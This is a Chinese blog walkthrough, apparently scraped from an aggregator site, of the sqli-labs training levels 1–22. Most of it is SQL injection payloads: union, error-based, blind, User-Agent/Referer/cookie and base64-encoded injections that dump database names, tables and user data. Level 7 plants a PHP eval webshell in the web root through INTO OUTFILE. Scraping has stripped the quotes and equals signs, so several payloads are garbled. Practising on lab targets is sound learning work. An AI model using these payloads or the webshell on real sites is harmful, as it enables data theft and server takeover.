当前位置: 首页 > news >正文

如何更改公司网站内容网站开发需要哪些文档

如何更改公司网站内容,网站开发需要哪些文档,微营销软件,wordpress网站制作教程2024.1.21 level-1 #xff08;单引号装饰#xff09; 先根据提示建立一个get请求 在尝试使用单个单引号测试#xff0c;成功发现语句未闭合报错 然后反手一个 order by 得到数据库共3列#xff0c;-- 后面加字母防止浏览器吃掉 -- 操作#xff08;有些会#xff09…2024.1.21 level-1 单引号装饰  先根据提示建立一个get请求 在尝试使用单个单引号测试成功发现语句未闭合报错 然后反手一个 order by 得到数据库共3列-- 后面加字母防止浏览器吃掉 -- 操作有些会 再把id改到一个不存在的值防止占用回显位接上 select 得到回显位是2,3 然后随便选一个回显位开始 爆库 -- 爆表 -- 爆字段 -- 爆数据 ?id-1 union select 1,2,database() -- a ?id-1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schemasecurity) -- a ?id-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers) -- a ?id-1 union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a 爆数据时也可以用 ?id-1 union select 1,2,(select concat(~,username,~) from security.users limit 0,1) -- a 或 ?id-1 union select 1,2,(select concat(~,username,~) from security.users where id1) -- a 来一个一个爆 level-1能有什么坏心思呢直接拿下(¬◡¬)✧ level-2 数字型  先尝试了一个和两个单双引号结果都报错那就在尝试 id2-1 发现返回的是id1的值那就很明显是个简单的数字型注入 然后就和level-1一样依葫芦画瓢 得列数 -- 爆库 -- 爆表 -- 爆字段 -- 爆数据 此处省略直接给最后一步 ?id-1 union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-2能有什么坏心思呢不过是leve-1变了个性罢了(¬◡¬)✧ level-3 单引号括号装饰  按惯例先小a一个单引号很好报错了看一下报错信息发现多了壳那就很容易猜到数据库接收的格式大概是 username(%s) 这样的那我们也套个壳并把原有的壳干掉 尝试了一下果然没错那接下来就是老操作 得列数 -- 爆库 -- 爆表 -- 爆字段 -- 爆数据 直接给poc ?id-1) union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-3能有什么坏心思呢不过是leve-1穿了个衣服罢了(¬◡¬)✧ level-4 双引号括号装饰  惯例上场先小a一个单引号没用再小a一个双引号直接破防猜出 username(%s)  那根据level-3的经验很容易造出绕过 构造出poc ?id-1) union select 1,2,(select group_concat(~,username,~) from security.users limit 0,1) -- a level-4能有什么坏心思呢不过是leve-3的兄弟罢了(¬◡¬)✧ level-5 报错注入  很好对面上来就放隐身技能but我们先小a一个单引号专治各种花里胡哨对面马上显现 观察报错信息可知和level-1一个路数但对面都放技能了我们再平a就不太厚道了那就趁他病要他命直接甩个报错注入 Ps:两个常用的报错函数详细用法请自行了解 函数示例updatexml()?id-1 and updatexml(1,concat(0x7e,database(),0x7e),1)  -- aextractvalue()extractvalue(1,concat(0x7e,(mid((select user()),1,32)),0x7e)) 老套路 爆库 -- 爆表 -- 爆字段 -- 爆数据 ?id1 union select extractvalue(1,concat(~,database(),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),~)) -- a ?id1 and extractvalue(1,concat(~,(select group_concat(username) from security.users limit 0,1),~)) -- a Ps:因为报错注入最多显示32位所以最后面的 ~ 没了这也是 ~ 存在的原因可以判断字段是否显示完整 level-5能有什么坏心思呢不过是leve-1想和你玩躲猫猫罢了(¬◡¬)✧ level-6 报错注入  很好又来小a一个单引号没用那就小a一个双引号直接秒了 直接给出poc ?id1 and extractvalue(1,concat(~,(select group_concat(username) from security.users limit 0,1),~)) -- a level-6能有什么坏心思呢不过是leve-1的兄弟想和你玩躲猫猫罢了(¬◡¬)✧ level-7 转储到输出文件  又开始玩花招了报错信息被ban了但他还留了提示 use outfile  但依然还是先判断绕过的格式经过一番激烈的斗争......,得到了格式为 )) 要想mysql读写文件需要更改mysql配置 找到mysql里的my.ini在[mysqld]中加入 secure-file-priv 保存并重启mysql即可 那既然 outfile 都甩脸上了直接写一个一句话木马再用蚁剑一连哎小样给你底裤都扒干净咯 ?id-1)) union select 1,2,?php eval($_POST[abc]);? into outfile D:\\2.tools_app\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php -- a level-7能有什么坏心思呢不过是leve-1不想被你看光光罢了(¬◡¬)✧ level-8 盲注  level-7 异父异母的亲兄弟小a个单引号很容易判断出注入点 id1 -- a 但很显然 level-8 吸收了level-7 的缺陷一句话木马注不进去那么我们也要改变战术——盲注走起那么—— 先爆破一下库名的长度长度为8 ?id1 and length(database())1 -- a 在对库名进行爆破,整理得 security ?id1 and mid((select database()),1,1)a -- a 爆表名得emails,referers,uagents,users ?id1 and mid((select group_concat(table_name) from information_schema.tables where table_schemadatabase()),1,1)a -- a 爆字段和爆数据操作类似不写了偷个懒 level-8能有什么坏心思呢不过是leve-1欲情故纵罢了(¬◡¬)✧ level-9 盲注  很好开始装高冷了输什么都是一个样那么就来看看你内心是否真的波澜不惊 抓包扔到 repeater 中可以看到 Content-Length: 707 代表正确 然后小a一个单引号马上显形 那么后续操作就和level-8一样了 ?id1 and mid((select database()),1,1)a -- a level-9能有什么坏心思呢不过是leve-1表面的风平浪静罢了(¬◡¬)✧ level-10 盲注  level-9的孪生兄弟双引号秒了 ?id1 and mid((select database()),1,1)a -- a level-10能有什么坏心思呢不过是想给leve-1报仇罢了(¬◡¬)✧ level-11 单引号装饰 变成表单了但任他变化万千单引号yyds 在反手接一个万能密码直接拿下 uname1or 11 -- apasswd2submitSubmit 这一题把GET请求变成了POST请求但套路还是一样的 level-11能有什么坏心思呢不过是leve-1画了个妆罢了(¬◡¬)✧ level-12 双引号括号装饰 这熟悉的感觉是level-4没错了 uname1) or 11 -- apasswd2submitSubmit level-12能有什么坏心思呢不过是leve-4画了个妆罢了(¬◡¬)✧  level-13  报错注入  level-3的注入格式 uname1) -- apasswd2submitSubmit 但是只有登录成功的标志我的数据呐┻━┻︵╰(‵□′)╯︵┻━┻这显然不是我们想要的想必level-5已经告诉了我们答案你说是吧报错注入 uname1) and updatexml(1,concat(~,(select database()),~),1) -- apasswd2submitSubmit level-13能有什么坏心思呢不过是画了妆的leve-3陪你玩躲猫猫罢了(¬◡¬)✧  level-14 报错注入  一个双引号的事没啥好说的 uname1 and updatexml(1,concat(~,(select database()),~),1) -- apasswd2submitSubmit level-14能有什么坏心思呢我甚至不好评价(¬◡¬)✧  level-15 盲注  配合万能钥匙可以判断出是单引号包装 uname1 or 11 -- apasswd2submitSubmit 正确错误都没回显位 这高冷的气息想必盲注的心已经按耐不住了 uname1 or mid((select database()),1,1)a -- apasswd2submitSubmit level-15能有什么坏心思呢他只是想尝尝盲注的味道罢了(¬◡¬)✧  level-16 盲注 依旧是先判断注入点有了前几关的练级三下五除二的试出格式 uname1) or 11 -- a passwdsubmitSubmit 然后就是熟悉的味道熟悉的盲注 uname1) or mid((select database()),1,1)s -- a passwdsubmitSubmit level-16能有什么坏心思呢他只是level-4的兄弟罢了(¬◡¬)✧ level-17  报错注入  好好好这个小卡拉蜜开始嘴臭了这能忍忍不了一点ε怒ε怒ε怒ε怒ε( oω′)ノ 看 [PASSWORD RESET] 知道是重置密码那就要猜一下用户名了用burp自带的字典爆了一下可以爆出这些用户名 unameadminpasswd1submitSubmit 接下来就是要爆数据了我先尝试了一下对uname注入但是失败了那么在试一下对passwd注入本来想着用盲注的可在造轮子的时候有了意外发现测了一下当password的长度21时会有警告 unameadminpasswd123456789012345678901submitSubmit 那么有没有利用之处呢  报错注入一手直接拿下 unameadminpasswd1and updatexml(1,concat(~,(select database()),~),1) -- asubmitSubmit 事后回顾: 看了一下源代码之所以username没有注入点是因为用了mysql_fetch_array() mysql_fetch_array() 函数从结果集中取得一行做为关联数组(即键值对数组带有指定的键的数组每一个键关联一个值或数字数组带有数字 ID 键的数组或两者兼有mysql 返回根据从结果集取得的行生成的数组若是没有更多行则返回 false。 level-17能有什么坏心思呢只是犯下了傲慢之罪罢了(¬◡¬)✧ level-18 User-Agent 注入 一开始就把IP怼脸上既然有IP显示那大概率http请求报头与数据库有交互既然有交互就有注入的机会在用admin登录看看有什么幺蛾子 unameadminpasswdadminsubmitSubmit 可以看到 User-Agent 也有交互那么针对 User-Agent 构造poc直接接在后面即可 and updatexml(1,concat(~,(select database()),~),1) and Ps:                         and        updatexml(1,concat(~,(select database()),~),1)        and                         ↓         ↓                                               ↓                                                ↓          ↓            与数据  连接                                    报错注入语句                                  连接   与数据            库原有  前后                                                                                            前后   库原有            的单引  语句                                                                                            语句   的单引            号闭合                                                                                                               号闭合 level-18能有什么坏心思呢只是想更多的了解你罢了(¬◡¬)✧ level-19 Referer 注入  和 level-18 殊途同归这题是 Referer 请求头注入改都不带改的直接一粘 and updatexml(1,concat(~,(select database()),~),1) and level-19能有什么坏心思呢不过想看看召唤自己的咒语罢了(¬◡¬)✧ level-20 cookie 注入 用admin登进去发现这次多了 cookie 属性那就抓包准备接借 cookie 之手进行注入 哎呀也没啥变化和level-19一样一粘可以了 and updatexml(1,concat(~,(select database()),~),1) and level-20能有什么坏心思呢他只是罢了(¬◡¬)✧唯有抓包才能发现的彩蛋也许吧 level-21 (cookie 注入数据加密)  从页面上就可以看出这次的数据被 baes64 加密了 中国有句古话师夷长技以制夷 用base64加密后的数据即可爆出数据 加密前 admin and updatexml(1,concat(~,(select database()),~),1) and 加密后  YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgJw level-21能有什么坏心思呢他只是进行了秘密行动罢了(¬◡¬)✧ level-22 (cookie 注入数据加密)   和level-21大差不差用双引号装饰 admin and updatexml(1,concat(~,(select database()),~),1) and YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSksJ34nKSwxKSBhbmQgIg level-22能有什么坏心思呢(¬◡¬)✧
http://www.zqtcl.cn/news/530609/

相关文章:

  • 洛阳建设工程网站宁波led网站建设
  • 五莲网站建设报价wordpress dux 5.3
  • 怎样做当地网站推广做电商要关注哪些网站
  • 安徽鸿顺鑫城建设集团网站设计外贸英文网站
  • 浦口区教育局网站集约化建设南京淄博网站建设方案
  • 学校网站建设的风险分析wordpress侧边栏显示单个分类列表
  • php网站安装图解帮别人建设网站多少利润
  • vs做的网站如何二手优品哪个网站做
  • 建设银行内部网站6建筑学院官网
  • 大学生做微商网站金华seo扣费
  • 以前老网站邯郸推广网络宣传哪家好
  • 网站建设技术网站建设奉节网站建设公司
  • 动漫视频网站模板动漫制作专业什么电脑最适合
  • 合网站建设注册一个500万的公司需要多少钱
  • 《网站推广策划》wordpress 写博客
  • 网站开发工程师面试问哪些问题免费下载软件商店安装
  • 建网站公司要钱吗公司制作网站跟企业文化的关系
  • 网站改版对用户的影响网站评论怎么做的
  • 许昌市做网站公司汉狮价格装修案例图片 效果图
  • 设计主题网站化肥厂的网站摸板
  • 做羊水亲子鉴定网站网络推广是啥
  • 怎样解析网站域名用哪个网站做首页比较好
  • 设计网站页面设计wordpress样式错乱
  • 静态网页模板免费网站wordpress悬浮按钮
  • 怎么制作学校网站大淘客网站代码
  • 如何做好一个网站wordpress 修改邮箱设置
  • 网站项目方案生态建设研究所网站
  • 用织梦做视频网站wordpress文章不能分段
  • 彩票网站开发. 极云邮箱类网站模板
  • 网站代运营协议网站 文件服务器